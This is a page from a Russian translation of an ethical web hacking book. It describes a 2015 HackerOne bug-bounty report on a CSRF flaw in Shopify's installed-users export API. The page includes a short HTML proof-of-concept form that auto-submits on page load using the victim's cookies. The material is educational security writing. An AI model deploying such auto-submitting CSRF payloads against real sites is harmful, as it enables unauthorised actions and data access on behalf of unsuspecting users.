Основы этичного веб-хакинга (перевод)

Размер шрифта: - +

Примеры

1. Экспорт установленных пользователей 
Shopify 
Сложность: Низкая 
Url: https://app.shopify.com/services/partners/api_clients/XXXX/export_- 
installed_users 
Ссылка на отчет: https://hackerone.com/reports/96470¹² 
Дата отчета: 29 октября 2015 
Выплаченное вознаграждение: $500 
Описание: 
API Shopify предоставляет эндпоинт для экспорта списка уста- 
новленных пользователей через URL, показанный выше. Уяз- 
вимость заключалась в том, что сайт мог сделать запрос к 
этому эндпоинту и получить в ответ информацию, посколькуShopify не использовал CSRF-токен для валидации этого за- 
проса. В результате, следующий HTML-код мог быть исполь- 
зован для отправки формы от имени ничего не подозреваю- 
щей жертвы. 
1 <html> 
2 <head><title>csrf</title></head> 
3 <body onLoad=”document.forms[0].submit()”> 
4 <form action=”https://app.shopify.com/services/partners\ 
5 /api_clients/1105664/export_installed_users” method=”GE\ 
6 T”> 
7 </form> 
8 </body> 
9 </html> 
В этом примере при простом посещении страницы Javascript 
отправляет форму, которая включает GET-запрос к API Shopify, 
используя cookie Shopify, установленные в браузере жертвы

Выводы 
Увеличивайте масштаб ваших атак и ищите баги 
не только на сайте, но и в API. Эндпоинты API 
также являются потенциальной площадкой для 
использования уязвимостей, так что стоит пом- 
нить об этом, особенно, если вы знаете, что API 
мог быть разработан или стать доступным после 
того, как был создан веб-интерфейс.



Евгений Этичный

Отредактировано: 08.03.2019

Добавить в библиотеку


Пожаловаться